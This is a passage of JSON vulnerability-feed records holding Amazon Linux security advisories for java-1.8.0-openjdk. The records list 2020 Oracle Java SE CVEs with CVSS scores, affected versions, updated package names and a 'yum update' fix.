([CVE-2020-14781 __](<https://access.redhat.com/security/cve/CVE-2020-14781>))\n\nVulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N). ([CVE-2020-14782 __](<https://access.redhat.com/security/cve/CVE-2020-14782>))\n\nVulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data as well as unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. 
It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 4.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N). ([CVE-2020-14792 __](<https://access.redhat.com/security/cve/CVE-2020-14792>))\n\nVulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 3.1 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N). ([CVE-2020-14796 __](<https://access.redhat.com/security/cve/CVE-2020-14796>))\n\nVulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. 
Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N). ([CVE-2020-14797 __](<https://access.redhat.com/security/cve/CVE-2020-14797>))\n\nVulnerability in the Java SE product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 11.0.8 and 15. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N). ([CVE-2020-14803 __](<https://access.redhat.com/security/cve/CVE-2020-14803>))\n\n \n**Affected Packages:** \n\n\njava-1.8.0-openjdk\n\n \n**Issue Correction:** \nRun _yum update java-1.8.0-openjdk_ to update your system. 
\n\n\n \n\n\n**New Packages:**\n \n \n i686: \n java-1.8.0-openjdk-devel-1.8.0.272.b10-1.56.amzn1.i686 \n java-1.8.0-openjdk-demo-1.8.0.272.b10-1.56.amzn1.i686 \n java-1.8.0-openjdk-src-1.8.0.272.b10-1.56.amzn1.i686 \n java-1.8.0-openjdk-debuginfo-1.8.0.272.b10-1.56.amzn1.i686 \n java-1.8.0-openjdk-headless-1.8.0.272.b10-1.56.amzn1.i686 \n java-1.8.0-openjdk-1.8.0.272.b10-1.56.amzn1.i686 \n \n noarch: \n java-1.8.0-openjdk-javadoc-1.8.0.272.b10-1.56.amzn1.noarch \n java-1.8.0-openjdk-javadoc-zip-1.8.0.272.b10-1.56.amzn1.noarch \n \n src: \n java-1.8.0-openjdk-1.8.0.272.b10-1.56.amzn1.src \n \n x86_64: \n java-1.8.0-openjdk-devel-1.8.0.272.b10-1.56.amzn1.x86_64 \n java-1.8.0-openjdk-demo-1.8.0.272.b10-1.56.amzn1.x86_64 \n java-1.8.0-openjdk-src-1.8.0.272.b10-1.56.amzn1.x86_64 \n java-1.8.0-openjdk-debuginfo-1.8.0.272.b10-1.56.amzn1.x86_64 \n java-1.8.0-openjdk-headless-1.8.0.272.b10-1.56.amzn1.x86_64 \n java-1.8.0-openjdk-1.8.0.272.b10-1.56.amzn1.x86_64 \n \n \n", "edition": 1, "modified": "2021-01-12T22:51:00", "published": "2021-01-12T22:51:00", "id": "ALAS-2021-1460", "href": "https://alas.aws.amazon.com/ALAS-2021-1460.html", "title": "Medium: java-1.8.0-openjdk", "type": "amazon", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-01-08T01:43:44", "bulletinFamily": "unix", "cvelist": ["CVE-2020-14803", "CVE-2020-14782", "CVE-2020-14792", "CVE-2020-14781", "CVE-2020-14779", "CVE-2020-14797", "CVE-2020-14796"], "description": "**Issue Overview:**\n\nVulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Serialization). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. 
Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L). ([CVE-2020-14779 __](<https://access.redhat.com/security/cve/CVE-2020-14779>))\n\nVulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: JNDI). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 3.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N). ([CVE-2020-14781 __](<https://access.redhat.com/security/cve/CVE-2020-14781>))\n\nVulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. 
Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N). ([CVE-2020-14782 __](<https://access.redhat.com/security/cve/CVE-2020-14782>))\n\nVulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data as well as unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 4.2 (Confidentiality and Integrity impacts). 
CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N). ([CVE-2020-14792 __](<https://access.redhat.com/security/cve/CVE-2020-14792>))\n\nVulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 3.1 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N). ([CVE-2020-14796 __](<https://access.redhat.com/security/cve/CVE-2020-14796>))\n\nVulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data. Note: Applies to client and server deployment of Java. 
This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N). ([CVE-2020-14797 __](<https://access.redhat.com/security/cve/CVE-2020-14797>))\n\nVulnerability in the Java SE product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 11.0.8 and 15. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N). ([CVE-2020-14803 __](<https://access.redhat.com/security/cve/CVE-2020-14803>))\n\n \n**Affected Packages:** \n\n\njava-1.8.0-openjdk\n\n \n**Issue Correction:** \nRun _yum update java-1.8.0-openjdk_ to update your system. 
\n\n\n \n\n\n**New Packages:**\n \n \n aarch64: \n java-1.8.0-openjdk-1.8.0.272.b10-1.amzn2.0.1.aarch64 \n java-1.8.0-openjdk-debug-1.8.0.272.b10-1.amzn2.0.1.aarch64 \n java-1.8.0-openjdk-headless-1.8.0.272.b10-1.amzn2.0.1.aarch64 \n java-1.8.0-openjdk-headless-debug-1.8.0.272.b10-1.amzn2.0.1.aarch64 \n java-1.8.0-openjdk-devel-1.8.0.272.b10-1.amzn2.0.1.aarch64 \n java-1.8.0-openjdk-devel-debug-1.8.0.272.b10-1.amzn2.0.1.aarch64 \n java-1.8.0-openjdk-demo-1.8.0.272.b10-1.amzn2.0.1.aarch64 \n java-1.8.0-openjdk-demo-debug-1.8.0.272.b10-1.amzn2.0.1.aarch64 \n java-1.8.0-openjdk-src-1.8.0.272.b10-1.amzn2.0.1.aarch64 \n java-1.8.0-openjdk-src-debug-1.8.0.272.b10-1.amzn2.0.1.aarch64 \n java-1.8.0-openjdk-accessibility-1.8.0.272.b10-1.amzn2.0.1.aarch64 \n java-1.8.0-openjdk-accessibility-debug-1.8.0.272.b10-1.amzn2.0.1.aarch64 \n java-1.8.0-openjdk-debuginfo-1.8.0.272.b10-1.amzn2.0.1.aarch64 \n \n i686: \n java-1.8.0-openjdk-1.8.0.272.b10-1.amzn2.0.1.i686 \n java-1.8.0-openjdk-debug-1.8.0.272.b10-1.amzn2.0.1.i686 \n java-1.8.0-openjdk-headless-1.8.0.272.b10-1.amzn2.0.1.i686 \n java-1.8.0-openjdk-headless-debug-1.8.0.272.b10-1.amzn2.0.1.i686 \n java-1.8.0-openjdk-devel-1.8.0.272.b10-1.amzn2.0.1.i686 \n java-1.8.0-openjdk-devel-debug-1.8.0.272.b10-1.amzn2.0.1.i686 \n java-1.8.0-openjdk-demo-1.8.0.272.b10-1.amzn2.0.1.i686 \n java-1.8.0-openjdk-demo-debug-1.8.0.272.b10-1.amzn2.0.1.i686 \n java-1.8.0-openjdk-src-1.8.0.272.b10-1.amzn2.0.1.i686 \n java-1.8.0-openjdk-src-debug-1.8.0.272.b10-1.amzn2.0.1.i686 \n java-1.8.0-openjdk-accessibility-1.8.0.272.b10-1.amzn2.0.1.i686 \n java-1.8.0-openjdk-accessibility-debug-1.8.0.272.b10-1.amzn2.0.1.i686 \n java-1.8.0-openjdk-debuginfo-1.8.0.272.b10-1.amzn2.0.1.i686 \n \n noarch: \n java-1.8.0-openjdk-javadoc-1.8.0.272.b10-1.amzn2.0.1.noarch \n java-1.8.0-openjdk-javadoc-zip-1.8.0.272.b10-1.amzn2.0.1.noarch \n java-1.8.0-openjdk-javadoc-debug-1.8.0.272.b10-1.amzn2.0.1.noarch \n 
java-1.8.0-openjdk-javadoc-zip-debug-1.8.0.272.b10-1.amzn2.0.1.noarch \n \n src: \n java-1.8.0-openjdk-1.8.0.272.b10-1.amzn2.0.1.src \n \n x86_64: \n java-1.8.0-openjdk-1.8.0.272.b10-1.amzn2.0.1.x86_64 \n java-1.8.0-openjdk-debug-1.8.0.272.b10-1.amzn2.0.1.x86_64 \n java-1.8.0-openjdk-headless-1.8.0.272.b10-1.amzn2.0.1.x86_64 \n java-1.8.0-openjdk-headless-debug-1.8.0.272.b10-1.amzn2.0.1.x86_64 \n java-1.8.0-openjdk-devel-1.8.0.272.b10-1.amzn2.0.1.x86_64 \n java-1.8.0-openjdk-devel-debug-1.8.0.272.b10-1.amzn2.0.1.x86_64 \n java-1.8.0-openjdk-demo-1.8.0.272.b10-1.amzn2.0.1.x86_64 \n java-1.8.0-openjdk-demo-debug-1.8.0.272.b10-1.amzn2.0.1.x86_64 \n java-1.8.0-openjdk-src-1.8.0.272.b10-1.amzn2.0.1.x86_64 \n java-1.8.0-openjdk-src-debug-1.8.0.272.b10-1.amzn2.0.1.x86_64 \n java-1.8.0-openjdk-accessibility-1.8.0.272.b10-1.amzn2.0.1.x86_64 \n java-1.8.0-openjdk-accessibility-debug-1.8.0.272.b10-1.amzn2.0.1.x86_64 \n java-1.8.0-openjdk-debuginfo-1.8.0.272.b10-1.amzn2.0.1.x86_64 \n \n \n", "edition": 1, "modified": "2021-01-05T23:34:00", "published": "2021-01-05T23:34:00", "id": "ALAS2-2021-1579", "href": "https://alas.aws.amazon.com/AL2/ALAS-2021-1579.html", "title": "Medium: java-1.8.0-openjdk", "type": "amazon", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2020-12-19T03:31:48", "bulletinFamily": "unix", "cvelist": ["CVE-2020-14803", "CVE-2020-14782", "CVE-2020-14792", "CVE-2020-14781", "CVE-2020-14779", "CVE-2020-14797", "CVE-2020-14796"], "description": "**Issue Overview:**\n\nVulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Serialization). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. 
Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L). ([CVE-2020-14779](<https://access.redhat.com/security/cve/CVE-2020-14779>))\n\nVulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: JNDI). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 3.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N). ([CVE-2020-14781](<https://access.redhat.com/security/cve/CVE-2020-14781>))\n\nVulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. 
Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N). ([CVE-2020-14782](<https://access.redhat.com/security/cve/CVE-2020-14782>))\n\nVulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data as well as unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 4.2 (Confidentiality and Integrity impacts). 
CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N). ([CVE-2020-14792](<https://access.redhat.com/security/cve/CVE-2020-14792>))\n\nVulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 3.1 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N). ([CVE-2020-14796](<https://access.redhat.com/security/cve/CVE-2020-14796>))\n\nVulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data. Note: Applies to client and server deployment of Java. 
This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N). ([CVE-2020-14797](<https://access.redhat.com/security/cve/CVE-2020-14797>))\n\nVulnerability in the Java SE product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 11.0.8 and 15. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N). ([CVE-2020-14803](<https://access.redhat.com/security/cve/CVE-2020-14803>))\n\n \n**Affected Packages:** \n\n\njava-1.8.0-openjdk\n\n \n**Issue Correction:** \nRun _yum update java-1.8.0-openjdk_ to update your system. 
\n\n\n \n\n\n**New Packages:**\n \n \n i686: \n java-1.8.0-openjdk-devel-1.8.0.272.b10-1.56.amzn1.i686 \n java-1.8.0-openjdk-demo-1.8.0.272.b10-1.56.amzn1.i686 \n java-1.8.0-openjdk-src-1.8.0.272.b10-1.56.amzn1.i686 \n java-1.8.0-openjdk-debuginfo-1.8.0.272.b10-1.56.amzn1.i686 \n java-1.8.0-openjdk-headless-1.8.0.272.b10-1.56.amzn1.i686 \n java-1.8.0-openjdk-1.8.0.272.b10-1.56.amzn1.i686 \n \n noarch: \n java-1.8.0-openjdk-javadoc-1.8.0.272.b10-1.56.amzn1.noarch \n java-1.8.0-openjdk-javadoc-zip-1.8.0.272.b10-1.56.amzn1.noarch \n \n src: \n java-1.8.0-openjdk-1.8.0.272.b10-1.56.amzn1.src \n \n x86_64: \n java-1.8.0-openjdk-devel-1.8.0.272.b10-1.56.amzn1.x86_64 \n java-1.8.0-openjdk-demo-1.8.0.272.b10-1.56.amzn1.x86_64 \n java-1.8.0-openjdk-src-1.8.0.272.b10-1.56.amzn1.x86_64 \n java-1.8.0-openjdk-debuginfo-1.8.0.272.b10-1.56.amzn1.x86_64 \n java-1.8.0-openjdk-headless-1.8.0.272.b10-1.56.amzn1.x86_64 \n java-1.8.0-openjdk-1.8.0.272.b10-1.56.amzn1.x86_64 \n \n \n", "edition": 1, "modified": "2020-12-16T20:31:00", "published": "2020-12-16T20:31:00", "id": "ALAS-2020-1461", "href": "https://alas.aws.amazon.com/ALAS-2020-1461.html", "title": "Medium: java-1.8.0-openjdk", "type": "amazon", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}]}